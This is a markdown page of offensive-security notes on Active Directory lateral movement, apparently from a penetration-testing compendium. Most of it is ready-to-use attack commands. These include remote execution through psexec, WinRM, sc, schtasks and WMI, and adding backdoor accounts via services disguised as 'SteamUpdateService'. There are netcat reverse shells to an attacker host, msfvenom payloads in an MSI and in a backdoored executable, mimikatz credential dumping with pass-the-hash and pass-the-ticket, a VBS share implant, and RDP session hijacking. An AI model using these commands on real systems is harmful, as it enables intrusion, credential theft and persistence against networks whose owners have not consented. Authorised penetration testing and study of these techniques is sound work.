killchain-compendium/misc/active_directory/lateral_movement.md

# Lateral Movement

* Finding credentials with more permissions move through the network cloaked, avoiding detection
* Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts

* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`

## Remote Processes

### psexec

* Port `445`
* `SMB` protocol
* Group membership: `Administrators`

* Upload the service binary to `ADMIN$` directory of the SMB server
* Use `psexesvc.exe` via service control manager to execute the remote process
* Communication will be established through a named pipe

```sh
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
```

### WinRM

* Ports `5985` (HTTP) and `5986` (HTTPS)
* Group Membership: `Remote Management Users`

* Execute powershell commands on remote targets

```sh
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
```

* Run through powershell alternatively via
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
```

### sc

* Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports
* Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135`
* Group Membership: `Administrators`

* Create service remotely via Service Control Manager (RPC) or `SVCCTL`

```sh
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService

sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
```

### schtasks

* Create remote scheduled tasks
```sh
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService" 
```
* Delete scheduled tasks via
```sh
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
```

### wmi

* Ports are
    * DCOM `135` RPC and dynamic ports
    * Wsman `5985` winrm HTTP and `5986` winrm HTTPS
* Group membership: `Administrators`

* To start, use the same object used for winrm
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
```

* Store the session
```sh
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
```

* __Spawn a remote process__
```sh
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
```

* Alternatively via
```sh
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%" 
```

* __Spawn a remote service__
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add"; 
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
```
* Initiate the service
```sh
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"

Invoke-CimMethod -InputObject $Service -MethodName StartService
```
* Start and stop via
```sh
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
```

* __Spawn a remote scheduled task__
```sh
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* Delete task via
```sh
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```

* __ Install a remote msi package__
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
```
* Upload and run via
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
```
* Alternatively on older systems via
```sh
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
```

## Further Authentication Methods

* NTLM
* Kerberos

### NTLM

#### __Pass the hash__

* Retrieve and pass a hash generated from the password

* Use mimikatz on local SAM
```sh
privilege::debug
token::elevate
lsadump::sam
```
    * Use mimikatz on lsass
```sh
privilege::debug
token::elevate
sekurlsa::msv
```

    * Open reverse shell via mimikatz
```sh
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP%  4711"
```

* Via RDP
```sh
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
``` 
* Via psexec
```sh
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
```
* Kerberos
```sh
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
```

### Kerberos

* Ticket and session key are needed

#### Pass The Ticket

* Extract via mimikatz
```sh
privilege::debug
sekurlsa::tickets /export
```
* TGS need low privilege account, TGT need administrative privileges
* Use the ticket to inject into a current session
```sh
kerberos::ptt <ticket>@<domain>.kirbi
```

* Check tickets via `klist`


#### Overpass The Hash

* Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
    * Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
    * `rc4` is a pure ntml hash
* Use the key to gain the TGT 
```sh
privilege::debug
sekurlsa::ekeys
```

* Open a reverse shell via
```sh
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```

## Writeable Shares

* Find a shortcut, a script or anything that keeps a connection over the network to a share

* Reuse a `*.vbs` via
```sh
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
```

* Reuse and inject into exisiting portable executable
```sh
msfvenom -a x64 --platform windows  -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
```

* Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name
```sh
PsExec64.exe -s cmd.exe
query user
```
* Check output and fill in
```sh
tscon <ID-of-target> /dest:<my-SESSIONNAME>
```
* Session state should be `DISC`, a session which was not exited correctly
* Windows Server < 2019 only without the password